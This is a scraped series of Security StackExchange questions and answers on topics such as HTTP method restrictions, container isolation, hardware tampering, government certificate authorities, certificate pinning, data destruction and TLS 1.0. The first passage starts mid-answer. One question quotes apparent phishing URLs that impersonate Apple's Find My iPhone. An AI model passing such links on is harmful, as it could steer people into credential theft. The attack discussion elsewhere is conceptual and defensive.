from a major, publicly traded company talking about how to do this. Here is OWASP's official page on this vulnerability: The parameter values for 'user', 'authz_token', and 'expire' will be
exposed in the following locations when using HTTP or HTTPS: Referer Header Web Logs Shared Systems Browser History Browser Cache Shoulder Surfing | {
"source": [
"https://security.stackexchange.com/questions/199557",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/115656/"
]
} |
199,776 | TL;DR: Is there a valid reason to demand a software vendor to stop using HTTP PUT and DELETE methods in a web application and use only GET and POST ? The application uses frameworks to whitelist allowed request paths and methods. In other words, is there any difference from the security standpoint in allowing the deletion of a record via either DELETE or POST methods without changing the code and security checks in it? Full question Our customer configured their Tomcat instance with the following, according to their corporate standard: <security-constraint>
<web-resource-collection>
<web-resource-name>restricted methods</web-resource-name>
<url-pattern>/*</url-pattern>
<http-method>CONNECT</http-method>
<http-method>PUT</http-method>
<http-method>DELETE</http-method>
<http-method>OPTIONS</http-method>
<http-method>TRACE</http-method>
</web-resource-collection>
<user-data-constraint>
<transport-guarantee>CONFIDENTIAL</transport-guarantee>
</user-data-constraint>
<auth-constraint />
</security-constraint> This, among the Http Header Security Filter configuration, made our application break. Our application provides the same HTTP Header security features in Spring Security. Also, our application is RESTful, so we widely use PUT and DELETE methods for file upload. In future releases, we are also planning to use websockets (but from a search, they don't use CONNECT, which is for proxying). Our customer said that they will have to raise a policy exception in production in order remove the offending lines from Tomcat configuration and make the application work. The security exception policy is triggered when vendor applications do not comply with security requirement in a way that 1) fixing the issue cannot be done within the schedules and 2) no evident vulnerability is found. Exception policies require senior management approval. However, security policy exceptions require our customer to engage the vendor within 6 months in "fixing the security issue". Within 6 months, vendor has to provide costs and deadlines to meet the security policy. This means that they will return to me asking for a quotation to make the application work with enabled HTTP method filtering and HTTP Header Security filter. I don't want to do them a favour and change all Ajax calls from RESTful patterns to GET/POST only, not even for money if possible. I would like instead to prove that their security implementation is not only incompatible, but redundant, with regards to the security implementations within the application. If we set a precedent in doing this customer a favour with PUT and DELETE requests, we will have to face requests like "be compatible with my framework/policy/environment" from a large customer base (all banks and financial institutions). In the future, that may turn against our cost management. Question is, as in the TLDR, could using PUT and DELETE methods alone, regardless of the security features of the application, pose a security risk? If proven that the sole HTTP verb does not pose a security risk, I will be able to raise a permanent exception policy and confront the IT staff with solid argumentation. Edit I work in a software factory that deploys the same product instance to a large number of customers and our cloud. We are fully using all the tools we have on board, including the REST pattern. We are planning to employ HATEOAS, WebSockets, resumable file downloads, and everything the web technology can offer us to deliver better experience. Yes, sounds like a marketing line. Anyway, security is still a concern in our products. | I suspect this is a case of someone zealously applying "best practices" that they don't understand. HTTP Verb Tampering Attack The reason this best practice exists is because of the HTTP Verb Tampering Attack. From this article : Many Web server authentication mechanisms use verb-based authentication and access controls. For example, an administrator can configure a Web server to allow unrestricted access to a Web page using HTTP GET requests, but restrict POSTs to administrators only. However, many implementations of verb-based security mechanisms enforce the security rules in an unsecure manner, allowing access to restricted resources by using alternative HTTP methods (such as HEAD) or even arbitrary character strings. So someone decided that because some apps are badly-written, all apps should be banned from accepting HTTP verbs other than GET or POST, because ... you know ... mumble mumble SECURITY!! My opinion (possibly incomplete / incorrect, please post comments) : Pure HTML / CSS / js content should be restricted to GET and POST because these are the only verbs allowed in the HTML spec . APIs (AJAX, REST) should be allowed to use any verb from the HTTP spec , that said: Be aware that even if your application-layer correctly enforces verb-based access controls, your webserver front-end may not, so you owe it to your customers to do some security testing and make sure your app enforces proper authentication and access controls on all verbs that you support. I recommend following the OWASP testing guide . It sounds like your app is fine and your customer has an overly-zealous security policy. As an aside, HEAD is an interesting example; some security scanners seem to complain if your app responds to HEAD requests, because some apps will return valid headers without invoking the proper auth checks. However, most properly designed apps will process a full GET and then only return the headers, including the correct content-length: . So for apps using modern frameworks, there is probably no way to bypass auth logic on your GET controller. Do some quick tests though! (Thanks @usr-local-ΕΨΗΕΛΩΝ for pointing this out in comments. See this Stack Overflow post for detail on how Spring MVC handles this.) | {
"source": [
"https://security.stackexchange.com/questions/199776",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67189/"
]
} |
199,905 | Recently, I have heard of a new virtualization tech called containers. Suppose the container has been compromised, does this mean the host is also compromised (since the container is a process on a host)? In terms of security, is a VM (virtual machine) more secure than containers? | If the kernel is compromised in the container, the host is compromised. Ostensibly, a compromised container should not be able to harm the host. However, container security is not great, and there are usually many vulnerabilities that allow a privileged container user to compromise the host. In this way, containers are often less secure than full virtual machines. That does not mean that virtual machines can't be hacked . They are just not quite as bad. If the kernel is exploited in a virtual machine, the attacker still needs to find a bug in the hypervisor. If the kernel is exploited in a container, the entire system is compromised, including the host. This means that kernel security bugs, as a class, are far more severe when containers are used. Containers are often implemented by using namespaces : A namespace wraps a global system resource in an abstraction that makes it appear to the process within the namespace that they have their own isolated instance of a global resource. Changes to the global resource are visible to other processes that are members of the namespace, but are invisible to other processes. Unfortunately, Linux namespaces typically expose a much greater attack surface area from the kernel. Many kernel vulnerabilities are exploitable in namespaces. While not every container solution uses Linux namespaces, they all use the same kind of technology, with the same security issues . Some containers, like Docker, are capable of making use of a syscall filtering framework called seccomp to reduce the attack surface area of the kernel. This is an improvement, but isn't enough. If you are not using containers and have no need for (unprivileged) user namespaces, you have the option to disable them by setting user.max_user_namespaces = 0 to improve security. From Daniel Shapira : [...] kernel exploits can be devastating for containerized environments. This is because containers share the same kernel as the host, thus trusting the built-in protection mechanisms alone isn’t sufficient. | {
"source": [
"https://security.stackexchange.com/questions/199905",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/194732/"
]
} |
199,971 | My laptop was confiscated by the military institute of my country and they made me to give them all my passwords (I cannot tell you the name of my country). They did not give it back to me for one week (yes, it was out of my sight for a while).
I nuked it from orbit but I just realised that it was on sleep state for 2 days and not in shutdown state, so it was connected to my modem via wifi. Does it need to be worried about? and I need to make sure if they have added something to monitor my activities or steal my data or not? And if they have done that, what should I do to prevent them. I have double checked the laptop physically and there is no sign of screw or plastic deformation. Is that still possible that they have compromised its hardware? | If the device left your sight for any amount of time, replace it. It can no longer be trusted. The cost to assure it can still be trusted significantly exceeds the cost of getting a new one There is effectively no way to verify that the hardware has not been tampered with without significant expertise and employing non-trivial resources. The only solution is to replace the laptop and all associated components. Without knowing your country or other aspects of the situation you are in, there is no way for me to comment on the likelihood of this, only on the technical feasibility. If you do need to verify the integrity of the laptop, there are a few things to check (non-exhaustive): Weight distribution - Verify the precise weight of each component (ICs, PCB, etc). Weight distributions can be analyzed using gyroscopic effects. This requires having uncompromised equipment nearby for comparison. Extremely precise measuring equipment is required. You'll need to be aware of the different tolerances each part has in order to know what is anomalous. Power consumption - Verify the power consumption of each component over time. Backdoors often use power, and their presence can sometimes be detected with a power analysis attack. Do not rely on this however, as integrated circuits can use extremely little power nowadays. PCB X-ray inspection - Use X-rays to view the circuit board internals. This requires expensive equipment for a multi-layer printed circuit board such as a laptop motherboard. It also requires many man hours of intensive inspection of each square micrometer of the device. This is probably the easiest to do, although still takes specialized equipment and skills. IC inspection - Physically remove the various layers on integrated circuits ("decapping") and analyze the internal die. For anything much more complicated than an 8051 microcontroller, this will require significant expertise and is not possible without a high level of domain knowledge and a lab. But this would have to be done for everything from the main chipset to every CPLD on the board. Do you have a full-face respirator and a fume hood for all the acid you'll need to use? Sounds excessive? It is, but this is what you would have to do to have a good level of confidence that no malicious hardware modifications have been made. It will be cheaper just to buy a new laptop. Note that this is not intended to be practical advice, and it is not even close to complete even if it was. It's meant only to illustrate this near-impossibility of searching for sophisticated hardware implants. I nuked it from orbit but I just realised that it was on sleep state for 2 days and not in shutdown state, so it was connected to my modem via wifi. Does it need to be worried about? In theory, compromised hardware or firmware would be made to compromise your wireless access point or other devices listening in. While a suspended state (sleep mode) normally also disables the NIC, you cannot make that assumption if the hardware is compromised. However, while this is theoretically possible, it would require a far more targeted attack, and most military groups will not want to give away their 0days by shooting them at any random nearby wireless devices. Unfortunately, it is also theoretically possible that your modem has been compromised. If that is the case though, I think it'd be incredibly unlikely that it was done by your exploited laptop, as they could have just taken over your modem through your internet connection (TR-069 is a bitch), assuming they can control or compromise your ISP. If they have tampered with your hardware, it's much more likely that they have only done so for surveillance purposes, not to spread some silly worm. I have double checked the laptop physically and there is no sign of screw or plastic deformation. Is that still possible that they have compromised its hardware? Absolutely. There are many ways to open a laptop without that fact being apparent. While many sophisticated chassis intrusion detection mechanisms exist (some that even detect small changes in air pressure that would indicate a person messing with it), there are some "ghetto" techniques which you may be able to use in the future. One technique is to sprinkle nail polish with glitter on the joints of the system, inside and out. Take a high-resolution photo of this (and don't store the photo on the computer!). If the device is opened, the precise layout of the glitter will be disrupted, and it will become exceptionally difficult to put it back in place. You can compare it with the stored photo and look for subtle differences. This is sufficient to detect tampering by most adversaries, if done right. The term for this is tamper-evidence , which is any technique that makes it difficult to tamper with a device without that fact being noticeable. More professional options would include bespoke tamper-evident security tape or holographic stickers. There are lots of epoxy potting solutions too (but beware of overheating!). Unfortunately, this can only help you in the future and will obviously be incapable of protecting your system retroactively. But consider how likely it is that they really compromised it. | {
"source": [
"https://security.stackexchange.com/questions/199971",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/194797/"
]
} |
200,243 | My bank card recently expired. I got a new one and this one turned out to be "lucky": its CVC code was 000 . For a few months I used it extensively, both online and offline, without any difficulties - until the day when I entered my card details on Booking.com. I filled in the form, clicked "submit" - only to see the page discard the value in the CVC field and demand that I enter it again. I contacted support. They confirmed that CVC code "000" is not acceptable because it is considered not secure enough (not an exact quote unfortunately, as the conversation was in Estonian), and they suggested that I order a new bank card where the CVC code would be different from "000". That puzzled me. As a former tester, I'm quite used to situations where I think I'm reporting a bug and then I'm told it is actually a feature, but this time it was somewhat against common sense. My current work is also related to information security and I can think of three reasons their claim doesn't make sense: CVC is not just a random number, there is a certain algorithm of generating it. This, in turn, means that all values are equally probable and some certain numbers can't just be excluded from it. I have already used this card with a number of other online services, including Amazon Web Services, whose security is out of any doubts. I don't quite understand what "not secure enough" means. Are "111" or "999" secure enough? If not, how about "123" or "234"? Again, it's not something I pick myself, it's something I'm given by a bank, and if the bank thinks it's secure, then it must be treated as such. Their response was very polite but not very helpful: " We totally understand your frustration and we are really sorry about causing you inconvenience. We handed your reasoning over to our management - they responded that 000 is considered invalid, and this is also a way banks indicate that the card is a forgery ". I forwarded the mail chain to my bank and asked for their advice. They told me they'd issue a new card for free, which solved the problem for me. However, I still wonder: Are there any official regulations/prescriptions (from Visa/MC or elsewhere) or any best practices regarding "all-zero" CVC/CVV codes? Especially that bit about banks allegedly using 000 as an indication of a forgery - sounds like complete nonsense to me. I tried googling, but couldn't find anything. From a practical point of view, how reasonable it is to decline "000" as insecure? I listed my concerns above, but maybe I'm missing something? Update : Tough choice on which answer to accept... I liked the answer from Alexander O'Mara a lot - it is detailed and to the point. The latest revision of Harper's answer also seems very reasonable. Yet I eventually decided to accept the answer by Zoey - it seems the most relevant, as it, besides everything else, also sheds some light on the internals of hotel business. Thanks everyone for your answers and comments! What I'm going to do now is contact Booking.com support again and insist on getting this fixed. Will let you know about the outcome. Update 2 : After several months of trying to contact Booking.com's support I officially give up. I haven't gone any further than a countless number of support tickets that were not even confirmed, not to mention being reacted on, and a couple of phone calls where I explained the situation and got nothing but a canned email "we are trying very hard to solve your problem". Bottomline: Booking.com's support doesn't work - unless your problem is very standard, it won't be solved nor escalated to higher management. The bug still exists. I'm now assured that it is nothing but a software bug, because CVC "000" is perfectly accepted when you add a new card, but it doesn't work when you are trying to update an expired (or otherwise invalid card). Here's the repro steps: Create a new booking that requires immediate payment. Enter an invalid card (expired or blocked). When the system sends a notification that the card can't be processed, select "update card details" and enter details of a valid card with CVC code 000. Expected result: the card data gets accepted for further processing. Actual result: the entered CVC code gets discarded and the dialog window complains that CVC code is not entered. | Alexander O'Mara provided a correct answer , but having worked in a hotel that was using booking.com I believe I can provide additional information about the reason that CVV was denied. Every day the hotel I worked in would receive around 50 bookings, a quarter of these bookings would be using fake credit card details, and about 90% of people using fake credit card details would not show up. This resulted in a lot of guesswork when assigning rooms, we would often try to guess if the person will show up just based on their credit card details, and also sometimes take into consideration the name, location, how many days they will be staying, etc.
We would also try to call the day before to confirm bookings, so that these fake bookings result in a minimal interruption to the business. Blocking CVV 000 is just booking.com's lazy attempt to reduce the amount of fake bookings. Some other CVVs are blocked as well. The reason why booking.com blocks the CVV and other websites do not is because other websites generally attempt to charge the credit card immediately, while booking.com only forwards information to the hotels which charge the credit card on the day of arrival. | {
"source": [
"https://security.stackexchange.com/questions/200243",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/195159/"
]
} |
200,261 | Recently there have been a lot of news articles which say that Facebook will very soon add advertising to WhatsApp, yet will keep the end-to-end encryption (source) : [M]essages will remain end-to-end encrypted. There are no plans to change that. I am trying to understand how advertisement is possible while keeping end-to-end encryption. I understand that there are several options: Advertisements are not targeted according to words used in messages, just general ads. It is possible to send additional/duplicate packets with the same information to the server, which also uses "end-to-end encryption". Yet, if that's the case, it's sort of "telling the truth but not all the truth". I find it hard to believe that such a method would be used. Are there other ways to do both ads and e2e encryption that you can think of? | Your WhatsApp account is linked to your Facebook account. They know lots about you from your Facebook activity, and can use that to direct targeted ads at you on WhatsApp, without knowing anything at all about the content of your WhatsApp messages. | {
"source": [
"https://security.stackexchange.com/questions/200261",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/145366/"
]
} |
200,720 | Let's assume I have a server set up with an email address like [email protected]. Now I have distributed my business card with the e-mail address to all people all over the world and they keep sending me confidential emails. But now I don't feel like paying for the domain mydomain.tld anymore. Now if someone buys the domain and creates a mx record pointing to the his own mail server he can read all my confidential emails the people are sending me right? No, I can't tell them to stop sending confidential mails because I can't contact them. Are there ways to prevent that or is the only option I have is to pay for the domain until I die? | Now if someone buys the domain and creates a mx record pointing to the his own mail server he can read all my confidential emails the people are sending me right? If they register the domain name, they will receive all email being sent to it from that point on. They will not have retroactive access to previously sent emails. There is nothing to fundamentally prevent this. Are there ways to prevent that or is the only option I have is to pay for the domain until I die? You can request that all contacts to you encrypt their communications with PGP using your public key, which will prevent anyone who obtains the domain later from reading new messages, but it requires people actually use PGP, which may not be likely if you are distributing the address to average people in a business card. However, if you maintain or at least renew the domain for, say, 20 years, then what are the chances that anyone is going to seriously send an email to such an ancient address? I asked the question on the Law Stack Exchange whether or not there would be any legal recourse to someone using your domain, and the answer was no: https://law.stackexchange.com/q/35917/15724 | {
"source": [
"https://security.stackexchange.com/questions/200720",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/195868/"
]
} |
200,725 | I was recently wondering whether there exists a way to make sure my government is not swapping out SSL certificates in order to intercept the traffic. I know almost all browsers are complaining in case of a self-signed certificate. But what prevents a government to issue their own keychain? One can imagine compromising the repositories containing packages with CA certificates and then issuing their own certificate in order to decipher the traffic. All the traffic is going through government loyal tier 1 operator which also has monopoly rights on providing Internet access. If that is not a possible case, what mechanism is preventing them from doing it? | If your adversary is a powerful nation-state threat actor, web PKI will not protect you. Nothing is preventing them from issuing their own certificate. In fact, many governments run their own certificate authorities, such as the US FPKI and affiliates . See a list of CAs currently trusted by Firefox: Government of France Government of Hong Kong (SAR), Hongkong Post Government of Japan, Ministry of Internal Affairs and Communications Government of Spain, Autoritat de Certificació de la Comunitat Valenciana (ACCV) Government of Spain (CAV), Izenpe S.A. Government of The Netherlands, PKIoverheid Government of Taiwan, Government Root Certification Authority (GRCA) Government of Turkey, Kamu Sertifikasyon Merkezi (Kamu SM) While Firefox currently refuses to trust the US FPKI, it still trusts many other government-run CAs, and a sophisticated nation-state actor absolutely has access to some existing, commercial CAs. Chrome, Internet Explorer, and Edge use the system trust store which, for Windows, does include many government certificate authorities, including the US FPKI. Any of these could be used to sign a valid certificate for any website and your browser would happily trust them without batting an eye. While the new and experimental standard for Certificate Transparency (CT) helps reduce the impact of mistakenly-issued certificates, it does not protect against a dedicated attacker who controls a malicious CA. Once it has seen greater adoption it may, however, make it easier to spot malicious or misbehaving CAs after a short period of time, but it will not prevent the attack immediately as it is performed. Some browsers use certificate pinning where important and high-profile domains are validated against a hardcoded list of permitted certificate authorities. Signing a fraudulent certificate for those domains would require compromising the CA that they currently use. Unfortunately, this only applies to a small handful of domains and does not protect the web at large. A partial solution would be to refuse to trust a domain without the .gov TLD whose certificate was issued by a government CA, which could be implemented client-side, but it would likely have little real-world impact. An adversarial government is not going to sign a malicious website with a state-run CA, since that would immediately attribute the attack to them. Rather, they would exploit covert relationships with existing CAs to trick them or force them into signing the certificate. CT, as mentioned in the previous paragraph, would detect this and the attack would be quickly noticed, but it does not prevent it. | {
"source": [
"https://security.stackexchange.com/questions/200725",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/195874/"
]
} |
200,726 | I want to build a PKI (public key infrastructure) to host certificates for users. My use case is, that I want to use the certificates for e2e encryption between the users. Users must be able to download valid certificates for a random user. (sharing is initiated by the sender) Certificates must still be valid, even if the receiver did not log in for a long time. (in theory months, years) For that to work, the user has to send me a CSR (certificate signing request) I have to check the CSR for validity I create the certificate with the CSR and my intermediate signing certificate Now I want to prolong the existing certificate. For that I could store the CSR in the database and just repeat step 3. Is this a good idea? (I have the feeling that it is not, but I cannot pinpoint the exact issue with this.) If not, what are good and reliable alternatives? (e.g. I want to keep the certificate valid, even if the user does not log in for a longer time) | If your adversary is a powerful nation-state threat actor, web PKI will not protect you. Nothing is preventing them from issuing their own certificate. In fact, many governments run their own certificate authorities, such as the US FPKI and affiliates . See a list of CAs currently trusted by Firefox: Government of France Government of Hong Kong (SAR), Hongkong Post Government of Japan, Ministry of Internal Affairs and Communications Government of Spain, Autoritat de Certificació de la Comunitat Valenciana (ACCV) Government of Spain (CAV), Izenpe S.A. Government of The Netherlands, PKIoverheid Government of Taiwan, Government Root Certification Authority (GRCA) Government of Turkey, Kamu Sertifikasyon Merkezi (Kamu SM) While Firefox currently refuses to trust the US FPKI, it still trusts many other government-run CAs, and a sophisticated nation-state actor absolutely has access to some existing, commercial CAs. Chrome, Internet Explorer, and Edge use the system trust store which, for Windows, does include many government certificate authorities, including the US FPKI. Any of these could be used to sign a valid certificate for any website and your browser would happily trust them without batting an eye. While the new and experimental standard for Certificate Transparency (CT) helps reduce the impact of mistakenly-issued certificates, it does not protect against a dedicated attacker who controls a malicious CA. Once it has seen greater adoption it may, however, make it easier to spot malicious or misbehaving CAs after a short period of time, but it will not prevent the attack immediately as it is performed. Some browsers use certificate pinning where important and high-profile domains are validated against a hardcoded list of permitted certificate authorities. Signing a fraudulent certificate for those domains would require compromising the CA that they currently use. Unfortunately, this only applies to a small handful of domains and does not protect the web at large. A partial solution would be to refuse to trust a domain without the .gov TLD whose certificate was issued by a government CA, which could be implemented client-side, but it would likely have little real-world impact. An adversarial government is not going to sign a malicious website with a state-run CA, since that would immediately attribute the attack to them. Rather, they would exploit covert relationships with existing CAs to trick them or force them into signing the certificate. CT, as mentioned in the previous paragraph, would detect this and the attack would be quickly noticed, but it does not prevent it. | {
"source": [
"https://security.stackexchange.com/questions/200726",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/195877/"
]
} |
200,792 | I have a web server set up and would like to connect to it from outside using Tor.
The web server simply serves up a simple webpage that will act as an interface for a program running on the machine.
It is not meant to be accessible by anyone else. If I set up another computer with SSH and set to log in using SSH keys to act as an SSH tunnel, is this secure enough from most attackers? With the SSH tunnel and Tor in place, is there a reason to use SSL or is all this secure enough?
What attacks are still possible and how do I defend against them? | If you are using public key authentication for SSH, no one can log in to the server without having the corresponding private key. This is as secure, and usually more secure, than password authentication. The encryption OpenSSH provides is state of the art; there is no known way to break it. You can further improve security on the Tor side by using authorized hidden services . This will make the domain inaccessible to all but your client. Note that this only works with v2 hidden services, not the latest v3. Since v2 has been deprecated, this is unfortunately no longer possible. The only remaining attack would be a man-in-the-middle attack. You can copy over the host key from the server to your client, just like you copied a key to make public key authentication possible. This will completely mitigate MITM attacks and the client will warn you if an attempt is detected. See also What is the difference between authorized_keys and known_hosts file for SSH? | {
"source": [
"https://security.stackexchange.com/questions/200792",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/183895/"
]
} |
201,033 | My iPhone was stolen a couple of weeks ago and I started receiving the following messages on my recovery secondary number that I provided with Find My iPhone: The URLs are: https://apple.inc-view.us/?auth=3455 https://apple.inc-locate.us/verify.php?ID=&auth=325&vr= And they mimic the interface of Find My iPhone where they're asking me for my Apple ID credentials. I logged into Apple ID and the phone hasn't registered since it was stolen. Wondering if there's something I can do to track them down or be mean to them. | Offensive defense is the type of attack you are looking to perform. You have been the victim of a technological crime, you are the target of a phishing campaign, and you want to get even. This is a very normal response and I can tell you that many organizations, governments, and individuals attempt this on their own daily. There is a major issue with any type of non-legal recourse, however. Due to the anonymity of the internet, and the relative ease of using a botnet to do malicious activity, it can be really difficult to assure that you only hurt the people you intend to hurt. In attacking an individual through a network relay, you may end up shutting down your own grand mother's computer which is less than ideal and totally irrelevant to the initial attackers. The only truly legal recourse is to co-ordinate with your local authorities and attempt to gain information back on the attackers. If you can glean any information from your cowardly attackers that may indicate name or location you can use this to work with the authorities. Also, if the phone is on, you can still attempt to use the "Find My Phone" feature to track down it's current location alongside the proper authorities (I do not recommend confronting thieves on your own or without legal support). In the end, it really sucks that you're in this position and I have compassion for you. Know that your options are limited, but do take advantage of the ones you can so you have the peace of mind knowing you did all you could legally do. That will be far better than putting your self in the position of risking jail time over a device. | {
"source": [
"https://security.stackexchange.com/questions/201033",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/196245/"
]
} |
201,037 | On sites like Facebook etc. you have the ability to create "private" photo albums that are only shared with selected friends, similarly in Messenger you can upload an image just to a specific chat. In the context of privacy and security on a social network, I'm assuming most people think these images etc. are secured. But are they? Am I right in assuming that actually the security comes from the fact that an uploaded image just has some kind of extremely hard to guess guid that forms the url? The fact that an album is hidden, therefore projects the urls for it's contained images being seen, but if someone had the URL for a specific image they could view it regardless. I know you can use scripts that generate an image (e.g a php script) whereby the image itself doesn't have an actual URL and is above the document root, but is more of $_GET parameter and the script could therefore enforce security. But something the scale of Facebook and Google where you would be relying on CDNs to deliver this content, a script handler for every image doesn't seem viable. Am I right in assuming it's actually just security through obfuscation? Or do these sites employ some kind of sophisticated ACL to actually control access to individual images? How should this be handled in the context of social networks e.g more image based then truly sensitive files? (though obviously an image itself could be sensitive to the uploader) | Offensive defense is the type of attack you are looking to perform. You have been the victim of a technological crime, you are the target of a phishing campaign, and you want to get even. This is a very normal response and I can tell you that many organizations, governments, and individuals attempt this on their own daily. There is a major issue with any type of non-legal recourse, however. Due to the anonymity of the internet, and the relative ease of using a botnet to do malicious activity, it can be really difficult to assure that you only hurt the people you intend to hurt. In attacking an individual through a network relay, you may end up shutting down your own grand mother's computer which is less than ideal and totally irrelevant to the initial attackers. The only truly legal recourse is to co-ordinate with your local authorities and attempt to gain information back on the attackers. If you can glean any information from your cowardly attackers that may indicate name or location you can use this to work with the authorities. Also, if the phone is on, you can still attempt to use the "Find My Phone" feature to track down it's current location alongside the proper authorities (I do not recommend confronting thieves on your own or without legal support). In the end, it really sucks that you're in this position and I have compassion for you. Know that your options are limited, but do take advantage of the ones you can so you have the peace of mind knowing you did all you could legally do. That will be far better than putting your self in the position of risking jail time over a device. | {
"source": [
"https://security.stackexchange.com/questions/201037",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/41211/"
]
} |
201,106 | This question indicates parents are to buy laptops for a school to install software and certificates. I am seeking to understand reasons for site certificates installation: Why would site certificates be installed? What is the potential for issues with the practice? I am seeking to understand both legitimate (constructive) reasons for certificates and potential for misuse / abuse. It is unclear from the thread how schools could somehow decrypt traffic with certificates. | There are two different kinds of certificates you could install on a machine: The first type of certificate is root certificate authority. A root certificate contains just a public key of the certificate authority. A root certificate is a trust anchor that is installed in your machine so that your machine can identify "trusted" sites to connect to, a certificate authority can issue a claim in the form of a server certificate that "X is owner of domain Y" and because your machine trusts the root certificate authority, it'll trust that claim. If the school/company installs a root certificate to your machine, your machine will trust whatever connections made to the school/company's server thinking that it is legitimate. If you install a root certificate, the school/company would be able to intercept any SSL/TLS connections made by your machine that runs through their network without triggering browser certificate errors/warning . The second type of certificate is client certificate. A client certificate contains a private key that is unique to you and a certificate signed by the school/company's certificate authority. A client certificate is used for your machine to authenticate to the school's infrastructure, proving that it is you that is connecting. A client certificate is used as essentially a better solution to authentication credential than having to remember passwords. A client certificate cannot be used by the school/company to eavesdrop on connections made by your machine to servers that aren't owned by the school/company. A client certificate is fine to install and shouldn't cause any security concerns. In contrast, be very wary of installing a root certificate, as it is a cause for concern as the root certificate can easily be abused. | {
"source": [
"https://security.stackexchange.com/questions/201106",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/115653/"
]
} |
201,117 | I have server which I am accessing via SSH. I only allow the authentication to be made with private key. Normally when I login via PuTTY, I am first asked for username and then asked for passphrase for the key. Out of curiosity I have created new private key, which should be invalid for my user and I also have put passphrase on it. To my surprise once I provided the user name the key attempted to login with to my server was refused before I have been asked for the passphrase. I am wondering how can SSH server know that the private key is incorrect if the passphrase for it haven't been provided yet? | While you've encrypted the private key, the public key is still readable. SSH authentication with the " publickey " method works by having the client send each potential public key to the server, then the server responds telling the client which key is allowed. If one of the keys is allowed, then the client must decrypt the private key to sign a message, proving ownership of the private key. In your experiment, the server responded saying that none of the provided keys was allowed for your username, so there was no need to decrypt a private key, authentication had already failed. | {
"source": [
"https://security.stackexchange.com/questions/201117",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/102283/"
]
} |
201,210 | On https://passwordsgenerator.net/ , it says Examples of weak passwords: qwert12345, Gbt3fC79ZmMEFUFJ, 1234567890, 987654321, nortonpassword The first, third, and fourth examples are obviously weak. I can't, however, see what's weak about the second one. Indeed, the only problem I see with it at the moment is that it doesn't have any special symbols. Is that enough for a password to be considered weak ? | I was curious about the same thing, so I put Gbt3fC79ZmMEFUFJ into Google, and lo! and behold it found something that wasn't just a paraphrase of "Don't use this password" advice — the password itself was embedded in example source code that showed how you could send a password to a server! ( link to page , and screenshot below) So I think the real goal of that advice is not that Gbt3fC79ZmMEFUFJ is a mysteriously weak password because of the keyboard layout or because of low entropy or because it doesn't include symbols or Unicode or emoji or whatever: It's simply to remind you that you should never use a password that's been published somewhere, especially one published as an "example" password! [ Update: This is intentionally a screenshot and not simply a code snippet; the content of the code is far less important than seeing how it appeared verbatim on somebody's website! ] | {
"source": [
"https://security.stackexchange.com/questions/201210",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/196427/"
]
} |
201,257 | Working with a non-profit organization,it's common to reuse hard drives that have previously stored highly sensitive information such as medical and financial records. This is primarily driven by cost-saving measures to reduce purchasing new hard drives. If the destruction of sensitive information is the first requirement, does this limit the choice in selecting the type of storage medium? For example, do non-flash based devices provide a higher level of assurance in the destruction of data using ATA Secure Erase and a single wipe in comparison to SSDs including self-encrypting drives? | Data destruction is a technique of last resort. If you are planning to use a new storage device, you should use full disk encryption. This allows you to either destroy the encrypted master key or simply forget the password, effectively rendering all data unrecoverable, despite no data actually being wiped. Encryption is a solution for both solid state and standard hard drives. Use a strong algorithm like AES. If you absolutely need to use a hard drive without full disk encryption, you should get one which supports SED , which is transparent hardware encryption. SED transparently encrypts all data written to the drive, but keeps the encryption key stored in a special area. When you initiate secure erasure, this key is all that is destroyed. This feature is supported on most modern SSDs and HDDs. If you do not know if a drive supports it, you can often conclude that it is supported if the estimated ATA Secure Erase time is showing as only two minutes , regardless of how large the drive itself is. There is nothing intrinsic to the data storage methods used by solid state media that makes it hard to perform data destruction, but their firmware makes it impossible for the operating system to overwrite specific sectors due to wear leveling, a feature that spreads writes around the drive to decrease the wear and tear on individual flash cells (each of which has a finite lifespan). This does mean that you cannot overwrite data on SSDs reliably. You can still use SED if the drive implements it, and you can use ATA Secure Erase as well, but if you need to manually overwrite a range of sectors, use an HDD. Note that, if you do use an SSD and are using full disk encryption and you have TRIM enabled, the drive will leak a limited amount of metadata, as explained in this excellent blog post . You can usually disable TRIM at a small performance penalty, but you will avoid metadata leakage. Whether or not the exact metadata leaked is problematic depends on your specific threat model. | {
"source": [
"https://security.stackexchange.com/questions/201257",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61038/"
]
} |
201,429 | Is it safe for an end user to browse a website that only supports TLSv1 (or other insecure ciphers or protocols), given the following: it's a publicly accessible website with no sensitive or private data it doesn't require user login, credentials or any other user data whatsoever. So for all intents and purposes, assume the website is intended to be an http:// site, but has an SSL cert installed on it that's out of date by modern security standards. And by safe, I mean they're not open to some type of exploit, other than MITM of course. By exploit here, I mean there's no way a bad SSL cert could be used to install malware on their machine in anyway, correct? | There is currently no real risk just based on the TLS protocol version for the end user when visiting a site which provides only TLS 1.0 (TLSv1) with a modern browser, i.e. a current version of Chrome, Firefox, Edge or chromium based browsers like Opera. Fortunately browser vendors today actually care about security and if TLS 1.0 would be too insecure it would be switched off or be restricted to only some white-listed sites or only for use with some ciphers. On the other hand: if a site is still offering only TLS 1.0 you might ask yourself how their relation to security is in general. While there might be some sites which knowingly support only TLS 1.0 it is more likely that they use some old systems or setups which is not able to support TLS 1.2 yet. Given that the most commonly used server-side SSL stack OpenSSL has support of TLS 1.2 since version 1.0.1 released in 2012 and that even OpenSSL 1.0.1 is out of support since some time, it is not unlikely that the owners of the site don't really care about security and that the rest of their infrastructure is outdated too. And that should worry you, not the use of TLS 1.0 by itself. | {
"source": [
"https://security.stackexchange.com/questions/201429",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/13524/"
]
} |
